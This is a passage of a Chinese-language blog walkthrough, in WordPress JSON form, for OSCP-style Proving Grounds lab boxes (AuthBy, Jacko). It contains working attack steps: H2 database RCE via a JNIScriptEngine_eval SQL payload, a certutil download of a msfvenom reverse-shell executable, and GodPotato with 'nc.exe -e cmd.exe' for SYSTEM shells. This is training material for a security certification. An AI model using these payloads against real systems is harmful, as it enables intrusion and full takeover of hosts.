\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ rlwrap nc -lvnp 6969\nlistening on [any] 6969 ...\nconnect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49345\nMicrosoft Windows [Version 6.0.6001]\nCopyright (c) 2006 Microsoft Corporation.  All rights reserved.\n\nC:\\Windows\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\Windows\\system32>type C:\\Users\\administrator\\Desktop\\proof.txt\ntype C:\\Users\\administrator\\Desktop\\proof.txt\n6652a16346292613ff24bbd7f9da8db4\n\nC:\\Windows\\system32><\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Jacko <\/h2>\n\n\n\n
80,139,445,9092,8082 port open<\/p>\n\n\n\n
\u5728 8082 port \u8dd1 H2 Database \uff0c\u4f7f\u7528\u9810\u8a2d\u7528\u6236\u540d\uff0c\u53ca\u7a7a\u5bc6\u78bc\u767b\u5165\uff0c\u4e26\u4e14\u53ef\u4ee5\u57f7\u884c sql<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u627e\u5230 exploit<\/a> \uff0c\u6839\u64da exploit \u64cd\u4f5c\u6210\u529f RCE<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u4f7f\u7528 msfvenom \u751f\u4e00\u500b reverse shell payload<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ msfvenom -p windows\/shell_reverse_tcp lhost=192.168.45.234 lport=4444 -f exe -o tmp.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 324 bytes\nFinal size of exe file: 73802 bytes\nSaved as: tmp.exe\n<\/code><\/pre>\n\n\n\n
\u76ee\u524d\u62ff\u5230\u7684 shell \u74b0\u5883\u53d7\u9650\uff0c\u5f88\u591a\u529f\u80fd\u90fd\u4e0d\u80fd\u7528 ex: dir \uff0c\u4f7f\u7528\u4ee5\u4e0b sql \u8a9e\u53e5\u4e0b\u8f09 payload \u5230\u76ee\u6a19\u6a5f\u5668\u3002<\/p>\n\n\n\n
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"certutil -urlcache -split -f http:\/\/192.168.45.234\/tmp.exe C:\/Windows\/Temp\/tmp.exe\").getInputStream()).useDelimiter(\"\\\\Z\").next()');\n<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u57f7\u884c\u8d77\u4f86<\/p>\n\n\n\n
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"C:\/Windows\/Temp\/tmp.exe\").getInputStream()).useDelimiter(\"\\\\Z\").next()');<\/code><\/pre>\n\n\n\n
\u6536\u5230 rev shell \u4e0d\u904e\u74b0\u5883\u4e00\u6a23\u662f\u721b\u7684<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Jacko]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 49828\nMicrosoft Windows [Version 10.0.18363.836]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Program Files (x86)\\H2\\service>whoami\nwhoami\n'whoami' is not recognized as an internal or external command,\noperable program or batch file.<\/code><\/pre>\n\n\n\n
\u7528 winPEASx86.exe \u767c\u73fe\u6709 SeImpersonatePrivilege <\/p>\n\n\n\n
\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0379 Current Token privileges\n\ufffd Check if you can escalate privilege using some enabled token https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/windows-local-privilege-escalation\/index.html#token-manipulation                                                                         \n    SeShutdownPrivilege: DISABLED\n    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\n    SeUndockPrivilege: DISABLED\n    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\n    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\n    SeIncreaseWorkingSetPrivilege: DISABLED\n    SeTimeZonePrivilege: DISABLED<\/code><\/pre>\n\n\n\n
\u63d0\u6b0a\u7684\u90e8\u5206\u6211\u7528 GodPotato-NET4.exe \u642d\u914d msfvenom \u751f\u7684 rev shell exe \u7121\u6cd5\u9806\u5229\u57f7\u884c\uff0c\u6539\u7528 nc.exe \u624d\u6210\u529f\u3002\u9019\u908a\u5168\u90e8\u90fd\u6709\u4f7f\u7528\u7d55\u5c0d\u8def\u5f91\uff0c\u56e0\u70ba\u74b0\u5883\u6c92\u8fa6\u6cd5\u8fa8\u8b58 cmd \u548c powershell <\/p>\n\n\n\n
PS C:\\Users\\tony> copy \\\\192.168.45.234\\share\\GodPotato-NET4.exe .\ncopy \\\\192.168.45.234\\share\\GodPotato-NET4.exe .\nPS C:\\Users\\tony> copy \\\\192.168.45.234\\share\\tmp.exe .\ncopy \\\\192.168.45.234\\share\\tmp.exe .\nPS C:\\Users\\tony> copy \\\\192.168.45.234\\share\\nc.exe .\ncopy \\\\192.168.45.234\\share\\nc.exe .\nPS C:\\Users\\tony> .\\GodPotato-NET4.exe -cmd \"C:\\Windows\\System32\\cmd.exe \/c C:\\Users\\tony\\nc.exe -e C:\\Windows\\System32\\cmd.exe 192.168.45.234 9999\"\n.\\GodPotato-NET4.exe -cmd \"C:\\Windows\\System32\\cmd.exe \/c C:\\Users\\tony\\nc.exe -e C:\\Windows\\System32\\cmd.exe 192.168.45.234 9999\"\n[*] CombaseModule: 0x140731985952768\n[*] DispatchTable: 0x140731988295264\n[*] UseProtseqFunction: 0x140731987662864\n[*] UseProtseqFunctionParamCount: 6\n[*] HookRPC\n[*] Start PipeServer\n[*] CreateNamedPipe \\\\.\\pipe\\5de5cc0f-2eb8-40a3-b769-1274eb571149\\pipe\\epmapper\n[*] Trigger RPCSS\n[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046\n[*] DCOM obj IPID: 00004002-0534-ffff-3cd7-645c19ac732b\n[*] DCOM obj OXID: 0x9f1e3f8045e72f04\n[*] DCOM obj OID: 0xdad109f2dcb933a7\n[*] DCOM obj Flags: 0x281\n[*] DCOM obj PublicRefs: 0x0\n[*] Marshal Object bytes len: 100\n[*] UnMarshal Object\n[*] Pipe Connected!\n[*] CurrentUser: NT AUTHORITY\\NETWORK SERVICE\n[*] CurrentsImpersonationLevel: Impersonation\n[*] Start Search System Token\n[*] PID : 788 Token:0x772  User: NT AUTHORITY\\SYSTEM ImpersonationLevel: Impersonation\n[*] Find System Token : True\n[*] UnmarshalObject: 0x80070776\n[*] CurrentUser: NT AUTHORITY\\SYSTEM\n[*] process start with pid 864<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ rlwrap nc -lvnp 9999\nlistening on [any] 9999 ...\nconnect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 50202\nMicrosoft Windows [Version 10.0.18363.836]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nwhoami\n\nC:\\Windows\\system32>type C:\\Users\\Administrator\\Desktop\\proof.txt\ntype C:\\Users\\Administrator\\Desktop\\proof.txt\nd66da0e71bd83f0769a6a0518bca75d8\n\nC:\\Windows\\system32><\/code><\/pre>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Lainkusanagi OSCP Li […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[16,14,13],"tags":[],"class_list":["post-126","post","type-post","status-publish","format-standard","hentry","category-lainkusanagi-oscp-like","category-pg-practice","category-tjnull-list"],"yoast_head":"\nLainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\" \/>\n<meta property=\"og:locale\" content=\"zh_TW\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article\" \/>\n<meta property=\"og:description\" content=\"Lainkusanagi OSCP Li […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\" \/>\n<meta property=\"og:site_name\" content=\"my article\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-15T12:33:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-01T09:44:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png\" \/>\n<meta name=\"author\" content=\"chengyunpu\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005:\" \/>\n\t<meta name=\"twitter:data1\" content=\"chengyunpu\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u4f30\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\"},\"author\":{\"name\":\"chengyunpu\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"headline\":\"Lainkusanagi OSCP Like & TJ Null list – Proving Grounds Practice\",\"datePublished\":\"2025-04-15T12:33:07+00:00\",\"dateModified\":\"2026-02-01T09:44:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\"},\"wordCount\":1825,\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png\",\"articleSection\":[\"Lainkusanagi OSCP Like\",\"PG practice\",\"tjnull list\"],\"inLanguage\":\"zh-TW\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\",\"name\":\"Lainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png\",\"datePublished\":\"2025-04-15T12:33:07+00:00\",\"dateModified\":\"2026-02-01T09:44:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#breadcrumb\"},\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31.png\",\"contentUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31.png\",\"width\":1878,\"height\":215},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\/\/chengyunpu.com\/wordpress\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Lainkusanagi OSCP Like & TJ Null list – Proving Grounds Practice\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/\",\"name\":\"my article\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-TW\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\",\"name\":\"chengyunpu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"caption\":\"chengyunpu\"},\"logo\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/chengyunpu.com\/wordpress\"],\"url\":\"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/","og_locale":"zh_TW","og_type":"article","og_title":"Lainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article","og_description":"Lainkusanagi OSCP Li […]","og_url":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/","og_site_name":"my article","article_published_time":"2025-04-15T12:33:07+00:00","article_modified_time":"2026-02-01T09:44:41+00:00","og_image":[{"url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png","type":"","width":"","height":""}],"author":"chengyunpu","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005:":"chengyunpu","\u9810\u4f30\u95b1\u8b80\u6642\u9593":"17 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/"},"author":{"name":"chengyunpu","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"headline":"Lainkusanagi OSCP Like & TJ Null list – Proving Grounds Practice","datePublished":"2025-04-15T12:33:07+00:00","dateModified":"2026-02-01T09:44:41+00:00","mainEntityOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/"},"wordCount":1825,"publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png","articleSection":["Lainkusanagi OSCP Like","PG practice","tjnull list"],"inLanguage":"zh-TW"},{"@type":"WebPage","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/","url":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/","name":"Lainkusanagi OSCP Like & TJ Null list - Proving Grounds Practice - my article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31-1024x117.png","datePublished":"2025-04-15T12:33:07+00:00","dateModified":"2026-02-01T09:44:41+00:00","breadcrumb":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#breadcrumb"},"inLanguage":"zh-TW","potentialAction":[{"@type":"ReadAction","target":["https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/"]}]},{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#primaryimage","url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31.png","contentUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2025\/04\/image-31.png","width":1878,"height":215},{"@type":"BreadcrumbList","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/chengyunpu.com\/wordpress\/"},{"@type":"ListItem","position":2,"name":"Lainkusanagi OSCP Like & TJ Null list – Proving Grounds Practice"}]},{"@type":"WebSite","@id":"https:\/\/chengyunpu.com\/wordpress\/#website","url":"https:\/\/chengyunpu.com\/wordpress\/","name":"my article","description":"","publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-TW"},{"@type":["Person","Organization"],"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411","name":"chengyunpu","image":{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","caption":"chengyunpu"},"logo":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/chengyunpu.com\/wordpress"],"url":"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/"}]}},"_links":{"self":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/comments?post=126"}],"version-history":[{"count":232,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/126\/revisions"}],"predecessor-version":[{"id":653,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/126\/revisions\/653"}],"wp:attachment":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/media?parent=126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/categories?post=126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/tags?post=126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}